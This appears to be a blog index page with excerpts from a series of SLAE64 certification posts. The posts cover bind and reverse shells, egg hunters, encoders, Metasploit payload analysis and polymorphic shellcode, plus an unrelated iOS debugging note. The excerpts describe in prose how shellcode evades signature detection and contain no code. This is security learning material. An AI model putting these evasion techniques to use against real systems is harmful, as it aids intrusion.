SLAE64: Assignment 6 – Polymorphic shellcodes

For assignment 6 of the SecurityTube Linux Assembly Expert certification the idea is to create polymorphic versions of existing shellcodes, specifically taken from shell-storm.org.

A polymorphic version of a shellcode is just the same functionality written with different instructions, registers and including nop instructions to break patterns and prevent detection.

For this assignment I chose the following shellcodes to work with:

  1. Linux/x86-64 – Read /etc/passwd – 82 bytes
  2. Linux/x86-64 – Add map in /etc/hosts file – 110 bytes
  3. Linux/x86-64 – setuid(0) + execve(/bin/sh) – 49 bytes

Continue reading SLAE64: Assignment 6 – Polymorphic shellcodes

SLAE64: Assignment 5 – Metasploit payloads analysis #3

This is the last payload that I’ve debugged so far for the 5th assignment on SecurityTube Linux Assembly Expert certification.

This time I opted by looking at the payload linux/x64/exec with the option to run ‘/bin/sh’.

Continue reading SLAE64: Assignment 5 – Metasploit payloads analysis #3

SLAE64: Assignment 5 – Metasploit payloads analysis #1

For the 5th assignment of the SecurityTube Linux Assembly Expert certification, I needed to analyze some metasploit payloads for Linux x64.

I started by looking at the linux/x64/shell_reverse_tcp.

Continue reading SLAE64: Assignment 5 – Metasploit payloads analysis #1

SLAE64: Assignment 4 – Custom Encoder

This is assignment #4 for the SecurityTube Linux Assembly Expert certification. It consists in the implementation of a custom encoder.

Encoding is a common strategy for obfuscating a shellcode payload as to avoid signature and pattern detection.

Continue reading SLAE64: Assignment 4 – Custom Encoder

SLAE64: Assignment 3 – Egg Hunter

This is the third assignment for the SecurityTube Linux Assembly Expert certification, it consists in the demonstration of my own implementation of an Egg Hunter that works with different payloads.

An Egg Hunter is a piece of code that will search for specific pattern, called the ‘egg’, in memory in order to find it’s address which usually prepends another injected payload containing the actual shellcode.

Continue reading SLAE64: Assignment 3 – Egg Hunter

SLAE64: Assignment 2 – Reverse TCP Shell

This is the second assignment for the SecurityTube Linux Assembly Expert certification, it consists in the creation of a password protected reverse shell.

A reverse shell is similar to a bind shell but instead of waiting passively for remote connections, it actively connects to a specified IP address and redirects STDIN, STDOUT and STDERR to that socket.

Continue reading SLAE64: Assignment 2 – Reverse TCP Shell

SLAE64: Assignment 1 – Bind TCP Shell with password

I’ve been taking the SecurityTube Linux Assembly Expert certification, this is the first assignment, the creation, in assembly, of a password protected bind shell.

A bind shell is essentially an open port on a machine that has STDIN, STDOUT and STDERR redirected to an inbound socket. It gets the name from the bind() system call which is a necessary step for listening on a port.

Continue reading SLAE64: Assignment 1 – Bind TCP Shell with password

iOS launch crash with reference to “setValue:forUndefinedKey:”

Just found that I need to be really careful when refactoring code that requires me to remove views from my project. I spent about 15 minutes trying to understand what the hell was going on, I was just receiving the following error:

I tried completely deleting my project from the device and simulator, running it again and still the same error. It turns out that I had removed all code references to customView but completely forgot about removing the outlets in the xib (Yeah still not a fan of storyboard).

So I guess I won’t be CTRL-dragging to hook up outlets anymore, it’s actually better to CTRL-Click on element or using the Connections editor because that way I can easily see warnings near broken or invalid connections.